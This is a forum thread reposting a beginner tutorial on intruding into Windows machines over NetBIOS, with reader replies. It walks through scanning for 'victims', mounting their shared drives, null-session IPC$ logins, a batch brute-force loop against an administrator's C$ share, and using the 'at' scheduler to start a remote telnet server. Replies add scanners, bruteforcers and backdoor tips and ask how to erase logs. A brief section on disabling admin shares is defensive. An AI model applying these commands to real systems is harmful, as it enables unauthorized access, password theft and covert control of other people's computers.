Decided to put this here instead of windows because it really is for beginners.






                                                        NETBIOS BASED HACKING TUTORIAL   BY GAURAV KUMAR

                                                                                
       gkverma@msn.com

Preface

Dear reader I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS. Using NetBIOS for hacking is the probably the easiest way to hack remotely. I strongly  oppose hacking but not ethical hacking. An ethical hacker is one that hacks computer networks not for anti social reasons but to let the network administrators know about the security holes so that they can prevent their computers from hacking. If you want to contact me please send me a mail to gaurav@sec33.com

Contents-

A brief  lesson on NetBIOS

The NBTSTAT command

What you need to hack ?

Types of attacks

Searching for a victim

Lets Hack - Part 1 Remotely reading/writing to a victim's computer

Cracking  "Share "passwords

Using IPC$ to hack Windows NT

Penetrating in to the victim's computer

Lets Hack - Part 2 Denial of service attack

How to protect yourself

 _______________________________________________________________________________
______________________________

A BRIEF LESSON ON NETBIOS

NetBIOS stands for Network Basic Input Output System  .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it also works on a port . It  has been assigned a port number 139.

________________________________________________________________________________
______________________________

THE NBTSTAT COMMAND

You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get

c:\windows>

If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.

Now lets play with the NBTSTAT command.

If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical  example

                                    NetBIOS Remote Machine Name Table

Name                            Number             Type                 Usage

==========================================================================

workgroup                      00                     G                      Domain Name

my_computer                 03                     U                      Messenger Service

myusername                  03                     U                      Messenger Service
 

MAC Address = 00-02-44-14-23-E6
 
 

Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.

This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command

NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156

If you want to get to know more about  the ip address and ports click here



________________________________________________________________________________
____

WHAT YOU NEED TO HACK

All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.


________________________________________________________________________________
____________________________
 
 

TYPES OF ATTACKS

We can launch two types of attack on the remote computer having  NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service



________________________________________________________________________________
_____________________________

Searching for a victim

You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports.  "Orge" is a port scanner that  gives NetBIOS names of the remote computer.



________________________________________________________________________________
____________________________

Lets Hack -Part 1 Remotely reading/writing to a victim's computer

Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .

If you would like to know more about  ip address click here . If you don't the ip address where File and Printer  Sharing is enabled read "Searching for a victim"

The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let suppose that the output comes out to be

         NetBIOS Remote Machine Name Table

Name                        Type             Status
-------------------------------------------------------------------------------------------------
user            <00>     UNIQUE       Registered
workgroup  <00>    GROUP        Registered
user            <03>     UNIQUE       Registered
user            <20>     UNIQUE       Registered
 

MAC Address = 00-02-44-14-23-E6
 
 

The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities

1.  You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .

2.  You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.

---------------------------------------------------------------------------------------------------------

Now our next step would be to view the drive or folders  the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let suppose we get the following output

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share  name                Type           Used as           Comment

-----------------------------------------------------------------------------------------------
CDISK                            Disk
 

The command completed successfully.
 
 

 "DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like
 
 

Shared resources at \\203.195.136.156
 

ComputerNameGoesHere

 Share  name                Type           Used as           Comment

 -----------------------------------------------------------------------------------------------
HP-6L                             Print
 

"Print " shows that the victim is sharing a printer named as HP-6L

 If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.

Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.

Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .

Lets do it.

We will use the NET command to do our work .

Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!

GO TO CONTENTS

________________________________________________________________________________
_____________________________

Cracking  Share passwords

Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -

Windows 95

Windows 98

Windows Me

GO TO CONTENTS

________________________________________________________________________________
______________________________

Using IPC$ to hack Windows NT,2000,XP

Now you must be thinking of something that can crack share passwords on  NT based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.

We hackers use IPC$ in this way

c:\windows>net use k:  \\123.123.123.123\ipc$ "" /user:""

You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.

Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.

GO TO CONTENTS

________________________________________________________________________________
______________________________
 

Penetrating in to the victim's computer

Now that you have access to a remote computer you may be interested in viewing  his secret emails, download hismp3 songs , and more...

But if you think like  a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or  install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access  permission.

GO TO CONTENTS

________________________________________________________________________________
_____________________________

Lets Hack - Part 2 Denial of service attack
 

This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.

The two most common vulnerabilities found in NetBIOS are

Vulnerability 1

Vulnerability 2

Another vulnerability that has been foud recently is that one can launch a DoS attack against winodws NT,2000,XP,.NET system. For detailed information and pacth plz visit this link http://www.microsoft.com/technet/treeview/...in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.



________________________________________________________________________________
______________________________

How to protect yourself

Please visit windowsupdate.microsoft.com and let the windows update itself.

________________________________________________________________________________
______________________________

The above tutorial has been written by Gaurav Kumar

If you need more help please feel free to email me gkverma@msn.com



http://www.mycgiserver.com/~ethicalhackers...rs/netbios.html

Disabling Shares


The system automatically creates hidden "administrative shares" for its logical drives C:, D:, and so forth which it names C$, D$ and so forth. It also creates the admin$ hidden share for to the \winnt folder. These shares are designed for remote access support by domain administrators. By default, if you delete these admin shares, they will be recreated when you reboot. To disable permanently so they will not be recreated on the next reboot, use the following Windows NT / Windows 2000 / Windows XP registry hack:
Hive: HKEY_LOCAL_MACHINE
Key: SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
Name: AutoShareServer for servers
Name: AutoShareWks for workstations
Type: REG_DWORD
Value: 0

For background: Q156365. For details on disabling in Windows XP, see Q314984. In Windows 2000 and Windows XP, you disable the shares via

Start
Settings
Control Panel
Systems Tools panel
Shared Folders
Double-click the Shared Folders branch to expand it
Click Shares
In the Shared Folder column, right-click the share you want to disable
Click Stop sharing
Cick OK.
NOTE: If you disable an administrative share that you have created, it will not be automatically enabled after you restart your computer, and you will need to recreate the share.
Perhaps the best approach to protect hard drive resources on workstations is to disable the server service if you can. There are a few workstation applications that need server service running, in particular, some SNA emulation packages.



http://is-it-true.org/nt/atips/atips2.shtml

alot of people talk smack about netbios hacking but i do sec audits for isp's and it's sad 2 say but this is a common hole. i think the main thing that people don't teach about netbios is the fact that you can compromise the entire system and even gain telnet access if u know what 2 do making this a vicios attack when done right.

i guess i would be a putts if i didn't throw in some examples at this point so here goes

using enum.exe and cis scanner it is easy as hell to grab all local user account names from a system with netbios enabled. these are easy to find so just search google or something. cis scanner makes a really nice report like this

Account Name :DavidF
The DavidF account is an ADMINISTRATOR, and the password was
changed 5 days ago. This account has been used 15 times to logon.

Comment :
User Comment :
Full name :David xxxxxxx


Account Name :Guest
The Guest account is a GUEST, and the password was
changed 0 days ago. This account has been used 0 times to logon.


Account Name :IUSR_FTP_VAL
The IUSR_FTP_VAL account is a GUEST, and the password was
changed 5 days ago. This account has been used 0 times to logon.

Comment :ID added for anonymous FTP
User Comment :
Full name :FTP Internet Guest Account

as u can see from this their is one admin account named davidf and that there is an anon ftp running. from this point you can try to find stuff like test accounts with admin privs and names like "test and backup" or you can try 2 bruteforce the admin account withthis command line script for ms-dos { for /f "tokens=1" %p in (pass.txt) do net use x: \\ipaddress\c$ %p /u:ipaddress\davidf } without the brackets and put a file in the same dir named pass.txt formated like this

secret
password
sexy
12345

and it will begin to try to guess the password. if you start to see the message "network device is allready in use" smoke em if u got em because your in.

the next step it to gain command line control using the scheduler the syntax here is

"at \\ipaddress"
hopefully u will get
"there no entries in the list"
then do a "net time \\ipaddress"
to get the time and try to schedule a task for 5 mins later like
at \\ipaddress 10:35P ""net start tlntsvr""
this will open telnet server on the target server or you could upload netcat or wsremote r other ways of getting command line access.


ok if anyone needs help or has any questions just let me know

Hi friend

I tried as you told ... But, when I used NET VIEW \\IPADDRESS , I got an error meesage... "SYSTEM ERROR 5 HAS OCCURED, ACCESS DENIED." Then I tried with another IP Adress, but this time I got another error "SYSTEM ERROR 53 HAS OCCURED, ACCESS DENIED".. Can you please tell me, why this..?

Manu

System error 5 - Access is denied

This is a permission issue. If the net view command fails with a "System error 5 has occurred. Access is denied." message, 1) make sure you are logged on using an account that has permission to view the shares on the remote computer.
2) Need to cache credential: logon the same username and password on both computers or use net net use \\computername /user:username command.
3) Make sure the Netlogon service is running.


System error 53 - The network path was not found.

Symptom: when using net view \\ip or \\computername, you get system error 53.

Resolutions: 1) if it is domain environment, check your WINS; 2) if it is peer-to-peer workgroup, enable NetBIOS over TCP/IP; 3) make sure the machine is running; 4) make sure file and Printer Share enabled on remote computer; 5) make sure client for ms networks is enabled on local computer; 6) make sure you type the correct name.

Hey all
dunno if it's off topic - but i could upload x-sharez 3.0.0.9 pro if someone wants it
it's a netbios-scanner including bruteforcer ...

c ya
DerTaller

Go right ahead DerTaller we are always looking for new toys.

Is this safe can the other guy not come to know about this.
What does one nedd to clean tracks?
Plz reply quick

Thanks for the Tutorial. I've been looking for something like this.

ipcscan.exe is awsome for this type of thing.
it scans large ranges of ips and checks deafult password
against the remote box. its might fast to.
once ya get a ip username and password.
load up dameware mini remote controle enter the ip username and password.
and play around with there computer just like you were sitting in frount of it.
its neato and should keep ya busy 4 a few weeks. did me..

Links
Dameware
IpcScan

Happy Hacking
NetComm

Most times if you get a "Access denied error" when running net view it is because you have no null session established or some other funky cached credentials.

Do this

net use * /delete

say yes to remove your connections. This command will remove any behind the scenes connections


next establish a null session:

net use \\target IP\ipc$ "" /user""

Now try net view again, bet it works

Hey netcomm where can i get the program ipcscan.exe you recommended and the link doesnt work

thanks

omg, use your brain and google for it......

thank you for this tutorial if been looking for this a long time!

Glad this post got bumped up, very good read. Hard to believe an old hack is still good.

thanx for good information. It's really helpfull

For anyone that wants the app direct from the source see http://www.tools-for.net/products.php?p=xsharez

Current version of XSharez is still as mentioned in previous post.

well its difficult to say it may work and it may not but mostly i dun think so since OSs will be updated

thx dude
just learning for fun always funny
thax

how do i run a program remotely plz?

i remember using the rhino9 tools back in the day for netbios hacking.

it's funny how netbios is one of the easiest security holes to close, yet one of the most commonly used ways to compromise a system.

the thing I used to like about netbios hacking was that it was _almost_ completely anonymous.

I was going through the mp3 shares of a friend of mine at work and the only thing that alerted him that I was there was his hard drive led blinking he shot me a net send message telling me I was busted .. lol

still doesnt answer my question

THX !. I was searching for it, really !

hey do you know how to make the remote computer auto start the telnet server everytime it connects to the net or boots up????
would be greatly appreciated for i having to access the computer physically to do so!

a bit old but ok for beginners

thanx for the tuts dissolutions. great knowledge.

Thnx 4 Tut


Its really simple 2 use!

regards
Kross

yes, very simple to use this tips..thanks m8..

yeah..dosnt really matter....
windows is soo easy to hack its just screaming to be xploited...
i cant remember the last time i used a windows machine... ive been running linux since i was 14
id never kick back.

nice tutorial dude

thanx for good info

Very good post!

its great that its been bumped up again, i didnt catch it the first time around...
thanks dissolutions great post...
today there's the whole pstools set which can be found here, which gives you way more options than before... and also there are great backdoors that are only a few k's that can be inserted easily... (i.e WinShell, metasploit.com bindshells, etc)
this vulnerability might be old, but its still alive and kickin... my friend actually found a korean one which gets to about 5mb/s (megabytes yes)...
then there's smb too (not as easy as netbios but still exploitable)...

I havent really dove into Netbios hacking as of yet... started with NT, then SQL, and I'm working on webdav right now... but I guess I'll try netbios out too if you can get results like you said... 5 mb/s compys... very nice

nice tutorial m8te thx for sharing this one

ntpass hacking = netbios hacking :.(

*sigh* I'm an idiot lol... dunno what I was thinking

this hack may work on some computer but the ones you really want t doesnt work on good work on posting the tutorial though its a great way to start. for this tutorial you should lookinto progs such as xscan or ipcscan or enum they help in hacking this way

great tut
thnx but allready read this.

thx 4 this really great tut !
nice work

greetz

Great tutorial mate. thanx for the effort!

are there any logs i have to delet?

tnx for the tut!

xsharez is awesome

really good tut.

see ya!

tekhead

Hi,
has anybody a Tutorial to Use a "Rootkit" like this from NetSec 2.43?

DJVASTVASTY2K postet in Public Downloads NetSec but i have no Plan to use this Rootkit.

What must i change in the inis and so on?

can someone help me?

Sry 4 my bad englisch.

Thnx
Kroiss

Very nice Tutorial man Thx

hi, im a noob with a question

when u say type:
net use k: \\ipaddress\ipc$ ""/user:""
do i actually type the ""/user:"" or am i supposed to put in the user name? what would the user name be then, and how would i found out? When i just type in the above i get system error 53. Thanks in advance.

ok thanks!
but how do we get a username and password?

I figured out some cool shit over netbios, it envolves the null session password, see i came accross a few systems that told me access was denied when i try to net view them, so i guessed that they had something to hide so i tried net use e: \\ip\c and it said IPC password invalid or something like that and it asked for me to put in a user and pass and gave me prompts, so outta pure luck(and educated guessing) i typed in anonymous as my user and "" /U:"" as my pass and it turns out it (filtered) up the server and gave me admin rights and connected the c drive to my e, i figured maybe it was just something to do with that computer, but it worked on a few others to, so i guess it's some sort of hole or exploit, or maybe it's just something that i happened to figure out, but it works and you get admin(it has failed on a couple machines) but most basic ones it works on so.....hack away my friends.